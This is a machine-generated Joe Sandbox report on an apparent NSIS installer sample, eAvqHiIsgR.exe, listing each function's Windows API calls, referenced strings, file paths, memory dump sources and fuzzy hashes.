Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54

Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(75923410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
FindClose.KERNELBASE(00000000), ref: 00406482

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC

Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000000), ref: 00403985
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75923410), ref: 004039FA
lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
GetFileAttributesA.KERNEL32(Call), ref: 00403A18
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

RegisterClassA.USER32(0042EBC0), ref: 00403A9E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
ShowWindow.USER32(00000005,00000000), ref: 00403B21
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
RegisterClassA.USER32(0042EBC0), ref: 00403B63
DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82

Strings

RichEdit20A, xrefs: 00403B45, 00403B4B
"C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 0040390E
C:\Users\user\AppData\Local\Temp\, xrefs: 0040390F
RichEd32, xrefs: 00403B35
_Nb, xrefs: 00403A7D, 00403AE5
.exe, xrefs: 00403A07
RichEdit, xrefs: 00403B54
Control Panel\Desktop\ResourceLocale, xrefs: 0040393E
1033, xrefs: 0040392A, 00403980
C:\Users\user\tranchet, xrefs: 00403994, 0040399C, 00403A34, 00403A3A, 00403A4A
.DEFAULT\Control Panel\International, xrefs: 00403970
RichEd20, xrefs: 00403B27
Call, xrefs: 004039C8, 004039D0, 004039DD, 00403A27, 00403A2D

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2911827090
Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

Function 00402EA1 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\eAvqHiIsgR.exe,00000400), ref: 00402ECE

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050

Strings

a, xrefs: 00402FA7, 00403004
C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
"C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 00402EA1
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
Error launching installer, xrefs: 00402EF1
C:\Users\user\Desktop\eAvqHiIsgR.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
soft, xrefs: 00402F8F
Inst, xrefs: 00402F86
Null, xrefs: 00402F98
@TA, xrefs: 00402F2F

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\eAvqHiIsgR.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$a
API String ID: 2803837635-1730591039
Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

Function 0040618A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
SHGetSpecialFolderLocation.SHELL32(00405256,759223A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
SHGetPathFromIDListA.SHELL32(759223A0,Call), ref: 00406312
CoTaskMemFree.OLE32(759223A0), ref: 0040631E
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,759223A0), ref: 00406394

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
#AT, xrefs: 00406197
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284
Call, xrefs: 004061B4, 00406281, 00406282, 00406283, 0040629F, 004062B4, 004062C7, 004062E3, 0040630E, 00406341, 00406347, 0040635F, 00406372, 0040638D, 00406393, 0040639B, 004063C5

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: #AT$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-4290025477
Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Strings

Call, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nso2EAF.tmp, xrefs: 004017A3, 00401812, 00401830
C:\Users\user\tranchet\Trykmaalere, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp$C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
API String ID: 1941528284-3239533306
Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040320F
wsprintfA.USER32 ref: 0040321F

Strings

... %d%%, xrefs: 00403219
HBB, xrefs: 004031C3, 004031DE, 00403255

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$HBB
API String ID: 551687249-372310663
Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32(?,00000000), ref: 00401E6B
CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA

Strings

Calibri, xrefs: 00401EA0

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
GetLastError.KERNEL32 ref: 0040573B
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
GetLastError.KERNEL32 ref: 0040575A

Strings

C:\Users\user\Desktop, xrefs: 004056E4
C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1521822154
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
wsprintfA.USER32 ref: 004064E2
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Strings

%s%s.dll, xrefs: 004064DC
UXTHEME, xrefs: 0040649B
\, xrefs: 004064BA

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405CD3
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED

Strings

nsa, xrefs: 00405CCA
"C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 00405CBF
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3058356216
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
